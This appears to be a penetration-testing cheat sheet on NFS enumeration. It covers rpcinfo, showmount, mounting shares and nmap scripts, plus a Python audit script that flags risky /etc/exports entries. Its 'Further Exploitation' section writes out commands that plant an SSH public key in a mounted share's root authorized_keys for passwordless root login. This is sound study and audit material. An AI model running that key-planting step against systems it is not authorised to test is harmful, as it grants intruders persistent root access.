# NFS Enumeration (Port 111, 2049)

## Quick Intro

* Developed in 1984 by Sun Microsystems; similar to SMB in that it allows access to files over a network.
* Common ports used by NFS are **ports 111 and 2049 (TCP/UDP)**.
* It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory.

## Identifying if NFS is in use

```
rpcinfo -p <ip>

# If 111 and 2049 are listed, shares are enabled and we can mount them
```

## Show all mounts

* If NFS is available, use **showmount** to view the available mount points.

```
showmount -e $ip
```

## Mount a NFS share

* You can then mount the file system with the **mount** command and interact with the remote system.
* First create the directory for mounting:

  `mkdir /mnt/nfs`

```
mount -t nfs $ip:/share /mnt/nfs
```

## Unmounting the shares

```
umount -f -l /mnt/nfs
# -f – Force unmount (in case of an unreachable NFS system). (Requires kernel 2.1.116 or later.)
# -l – Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore. (Requires kernel 2.4.11 or later.)
```

## Permission Denied?

{% embed url="<https://blog.christophetd.fr/write-up-vulnix/>" %}

## Further Exploitation

* **If you can write to the remote host, try putting an SSH key there** so that we can log in over SSH without a password:

```
ssh-keygen
# Generate an SSH key pair

cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys
# Append the public key to authorized_keys on the remote host

ssh root@$ip
# Now we can log in to the target without a password
```
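
Whether the key drop above succeeds depends on how the server exports the share. As an added example (not part of the original notes), this Python audit reads an `/etc/exports` body and flags entries open to any host, exported with `no_root_squash`, or marked `insecure`; option semantics follow exports(5), and the sample lines, host names and finding strings are constructed.

```python
WORLD = {"*", "0.0.0.0/0", "::/0"}  # client specs that match every host
# exports(5) option -> (setting, value); later options override earlier ones
TOGGLES = {"rw": ("rw", True), "ro": ("rw", False),
           "root_squash": ("squash", True), "no_root_squash": ("squash", False),
           "secure": ("secure", True), "insecure": ("secure", False)}

def audit_exports(text):
    """Return (path, client, [findings]) for each risky client entry in an exports file body."""
    results = []
    for raw in text.replace("\\\n", " ").splitlines():    # join continuation lines
        line = raw.split("#", 1)[0].strip()               # strip comments
        if not line:
            continue
        path, *specs = line.split()                       # assumes no spaces in the path
        defaults = []
        for spec in specs:
            if spec.startswith("-"):                      # "-opt,opt": defaults for later clients
                defaults = spec[1:].split(",")
                continue
            client, _, rest = spec.partition("(")         # "host(opt,opt)" or bare "host"
            # "host (rw)" with a stray space leaves an empty client name, which means any host
            client = client or "*"
            own = [o for o in rest.rstrip(")").split(",") if o]
            st = {"rw": False, "squash": True, "secure": True}   # defaults: ro, root_squash, secure
            st.update(TOGGLES[o] for o in defaults + own if o in TOGGLES)
            found = []
            if client in WORLD:
                found.append("any host can mount (%s)" % ("rw" if st["rw"] else "ro"))
            if not st["squash"]:
                found.append("no_root_squash: client uid 0 stays root")
            if not st["secure"]:
                found.append("insecure: unprivileged source ports accepted")
            if found:
                results.append((path, client, found))
    return results

SAMPLE = """# constructed sample, not taken from any real host
/srv/share   *(rw,no_root_squash)
/srv/docs    192.0.2.0/24(ro)
/home        build01.example.com (rw)
/srv/backup  -rw,insecure 192.0.2.10 192.0.2.11(ro)
"""

if __name__ == "__main__":
    for path, client, found in audit_exports(SAMPLE):
        print(f"{path:12} {client:14} {'; '.join(found)}")
```

The `/home` line shows the stray-space case: `build01.example.com` gets the defaults, while `(rw)` on its own applies to every host.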

## Nmap Scan on RPCbind and NFS

```
nmap -v -p 111 10.11.1.1-254

nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254

# Quote the glob so the shell does not expand it against local files
nmap -p 111 --script "nfs*" 10.11.1.72
```


